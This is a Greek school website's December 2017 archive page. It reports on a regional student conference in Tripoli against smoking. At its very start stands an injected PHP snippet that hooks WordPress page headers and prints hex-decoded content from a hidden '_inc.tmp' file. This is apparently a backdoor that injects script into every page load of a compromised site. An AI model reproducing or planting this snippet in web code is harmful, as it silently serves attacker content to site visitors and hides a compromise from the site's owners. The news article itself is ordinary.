if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Δεκέμβριος, 2017 |

Monthly Archives: Δεκέμβριος 2017

“Παιδεία για έναν κόσμο χωρίς κάπνισμα”

Τα παιδιά μέσα από τραγούδια, θεατρικά και ταινίες είπαν “όχι” στην κακή εξάρτηση από το κάπνισμα και “ναι” στη ζωή και κέρδισαν το χειροκρότημα των παρευρισκόμενων. Χαιρετισμούς, απονομή τιμητικών πλακετών σε μαθητές που διακρίθηκαν σε Πανελλήνιο Διαγωνισμό σχετικά με το κάπνισμα και παρουσίαση εκπαιδευτικών δραστηριοτήτων από μαθητές δημοτικών και Γυμνασίων-Λυκείων της Πελοποννήσου περιλάμβανε το πρόγραμμα του 8ου Πανελλήνιου Μαθητικού Συνεδρίου με τίτλο “Παιδεία σε έναν κόσμο χωρίς κάπνισμα”.

Το συνέδριο πραγματοποιήθηκε στην Τρίπολη, στο Αποστολοπούλειο Πνευματικό Κέντρο, από το πρωί μέχρι το μεσημέρι της Τρίτης 28 Νοεμβρίου και οι μαθητές ήταν κατά κύριο λόγο οι πρωταγωνιστές, αφού οι δραστηριότητες που παρουσίασαν εντυπωσίασαν και κέρδισαν το χειροκρότημα των παρευρισκομένων. Αρκεί βέβαια αυτά τα παιδιά να μην γίνουν στο μέλλον καπνιστές και να κατάφεραν κάποιον καπνιστή, μέσα από τα μηνύματα που πέρασαν, να τον κάνουν να κόψει το τσιγάρο και να πει “όχι” στο κάπνισμα και “ναι” στη ζωή.

Μπορείτε να δείτε τις δραστηριοτητες του Σχολείου μας στους παρακάτω συνδέσμους.